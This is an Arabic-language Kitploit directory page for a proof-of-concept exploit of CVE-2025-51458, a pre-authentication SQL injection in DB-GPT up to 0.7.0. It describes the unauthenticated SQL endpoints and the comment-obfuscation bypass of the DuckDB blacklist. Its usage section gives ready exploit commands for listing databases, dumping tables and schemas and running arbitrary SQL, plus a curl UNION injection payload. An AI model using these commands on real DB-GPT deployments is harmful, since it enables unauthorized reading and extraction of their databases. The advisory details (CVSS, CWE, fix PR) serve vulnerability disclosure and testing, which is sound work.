Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-51458-exp — CVE-2025-51458 - DB-GPT إثبات المفهوم لثغرة حقن SQL قبل المصادقة PoC | Kitploit
أدوات/GitHubGitHub/q1uf3ng/cve-2025-51458-exp
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقأمن قواعد البيانات
GitHubq1uf3ng/cve-2025-51458-exp

CVE-2025-51458-exp

CVE-2025-51458 - DB-GPT إثبات المفهوم لثغرة حقن SQL قبل المصادقة PoC

عرض المستودع
11منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-51458-exp

حقن SQL قبل المصادقة في DB-GPT <= 0.7.0

نظرة عامة

تقبل نقاط النهاية /api/v1/editor/sql/run و /api/v1/editor/chart/run استعلامات SQL عشوائية دون مصادقة. تغطي القائمة السوداء sanitize_sql DuckDB فقط؛ تتلقى اتصالات MySQL و PostgreSQL و SQLite مدخلات المستخدم الخام دون أي تصفية. يمكن تجاوز القائمة السوداء الخاصة بـ DuckDB نفسها عبر إخفاء التعليقات (SEL/**/ECT).

يمثل هذا تجاوزًا لـ CVE-2024-10835 و CVE-2024-10901.

  • CVSS: 6.5 (متوسط)
  • النوع: CWE-89 (حقن SQL)
  • المصادقة: غير مطلوبة (قبل المصادقة)
  • المتأثر: DB-GPT <= 0.7.0
  • المُصلَح: PR #2650

الاستخدام

root@kitploit:~
# List databases
python3 exp.py http://target:5670 --list-dbs

# Execute SQL
python3 exp.py http://target:5670 <db_name> --sql "SELECT VERSION()"

# Dump tables
python3 exp.py http://target:5670 <db_name> --dump-tables

# Dump schema
python3 exp.py http://target:5670 <db_name> --dump-db

# DuckDB bypass
python3 exp.py http://target:5670 <db_name> --duckdb-bypass --sql "SELECT CURRENT_SETTING('access_mode')"

# Interactive mode
python3 exp.py http://target:5670 <db_name>

إثبات المفهوم السريع

root@kitploit:~
curl -X POST "http://target:5670/api/v1/editor/sql/run" \
  -H "Content-Type: application/json" \
  -d '{"db_name":"test_db","sql":"SELECT 1 UNION ALL SELECT table_name FROM information_schema.tables--"}'

المراجع

  • NVD
  • مدونة Gecko للأمان
  • الإصلاح PR #2650
تنزيل الأداة